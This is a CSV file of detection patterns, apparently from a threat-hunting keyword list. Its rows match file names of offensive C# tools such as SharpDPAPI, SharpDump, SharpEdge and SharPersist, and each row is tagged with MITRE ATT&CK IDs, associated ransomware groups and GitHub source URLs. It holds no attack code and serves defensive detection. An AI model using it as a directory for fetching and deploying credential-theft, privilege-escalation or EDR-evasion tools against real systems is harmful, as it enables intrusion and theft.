"*\SharpDir.exe*",".{0,1000}\\SharpDir\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18493"
"*\SharpDir.exe*",".{0,1000}\\SharpDir\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18494"
"*\SharpDir.exe*",".{0,1000}\\SharpDir\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18495"
"*\SharpDirLister.exe*",".{0,1000}\\SharpDirLister\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18496"
"*\SharpDomainSpraty\*",".{0,1000}\\SharpDomainSpraty\\.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","18497"
"*\SharpDomainSpray.exe*",".{0,1000}\\SharpDomainSpray\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18498"
"*\SharpDoor.cs*",".{0,1000}\\SharpDoor\.cs.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","18499"
"*\SharpDoor.exe*",".{0,1000}\\SharpDoor\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18500"
"*\SharpDoor.exe*",".{0,1000}\\SharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","18501"
"*\SharpDPAPI.cna*",".{0,1000}\\SharpDPAPI\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18502"
"*\SharpDPAPI.exe*",".{0,1000}\\SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18503"
"*\SharpDPAPI.exe*",".{0,1000}\\SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18504"
"*\SharpDPAPI.exe*",".{0,1000}\\SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18505"
"*\SharpDPAPI.exe*",".{0,1000}\\SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18506"
"*\SharpDPAPI.exe*",".{0,1000}\\SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","SharpDPAPI","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18507"
"*\SharpDPAPI.txt*",".{0,1000}\\SharpDPAPI\.txt.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18508"
"*\SharpDPAPI\*",".{0,1000}\\SharpDPAPI\\.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","18509"
"*\SharpDump.csproj*",".{0,1000}\\SharpDump\.csproj.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","18510"
"*\SharpDump.exe*",".{0,1000}\\SharpDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18511"
"*\SharpDump.exe*",".{0,1000}\\SharpDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18512"
"*\SharpDump.exe*",".{0,1000}\\SharpDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18513"
"*\SharpDump.exe*",".{0,1000}\\SharpDump\.exe.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","18514"
"*\SharpEdge.csproj*",".{0,1000}\\SharpEdge\.csproj.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on  https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","18515"
"*\SharpEdge.exe*",".{0,1000}\\SharpEdge\.exe.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on  https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","18516"
"*\SharpEdge.sln*",".{0,1000}\\SharpEdge\.sln.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on  https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","18517"
"*\SharpEdge-master*",".{0,1000}\\SharpEdge\-master.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on  https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","18518"
"*\SharpEDRChecker-*.zip*",".{0,1000}\\SharpEDRChecker\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","18519"
"*\SharpEDRChecker.cs*",".{0,1000}\\SharpEDRChecker\.cs.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","18520"
"*\SharpEDRChecker.exe*",".{0,1000}\\SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18521"
"*\SharpEDRChecker.exe*",".{0,1000}\\SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18522"
"*\SharpEDRChecker.exe*",".{0,1000}\\SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18523"
"*\SharpEDRChecker.sln*",".{0,1000}\\SharpEDRChecker\.sln.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","18524"
"*\SharpEDRChecker\*",".{0,1000}\\SharpEDRChecker\\.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","18525"
"*\SharpEfsPotato*",".{0,1000}\\SharpEfsPotato.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","18526"
"*\SharpEfsPotato.pdb*",".{0,1000}\\SharpEfsPotato\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18527"
"*\SharpEfsPotato.pdb*",".{0,1000}\\SharpEfsPotato\.pdb.{0,1000}","offensive_tool_keyword","SharpEfsPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18528"
"*\SharpElevator.cs*",".{0,1000}\\SharpElevator\.cs.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","18529"
"*\SharpElevator.exe*",".{0,1000}\\SharpElevator\.exe.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","18530"
"*\SharpElevator.sln*",".{0,1000}\\SharpElevator\.sln.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","18531"
"*\SharPersist.exe*",".{0,1000}\\SharPersist\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18532"
"*\SharPersist.exe*",".{0,1000}\\SharPersist\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18533"
"*\SharPersist.exe*",".{0,1000}\\SharPersist\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18534"
"*\SharPersist\*",".{0,1000}\\SharPersist\\.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","18535"
"*\SharpEventLog.csproj*",".{0,1000}\\SharpEventLog\.csproj.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","18536"
"*\SharpEventLog.exe*",".{0,1000}\\SharpEventLog\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18537"
"*\SharpEventLog.exe*",".{0,1000}\\SharpEventLog\.exe.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","18538"
"*\SharpEventLog.pdb*",".{0,1000}\\SharpEventLog\.pdb.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#content","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","18539"
"*\SharpEventLog.sln*",".{0,1000}\\SharpEventLog\.sln.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","18540"
"*\SharpEventLog-master*",".{0,1000}\\SharpEventLog\-master.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","18541"
"*\SharpExcelDCom.exe*",".{0,1000}\\SharpExcelDCom\.exe.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","18542"
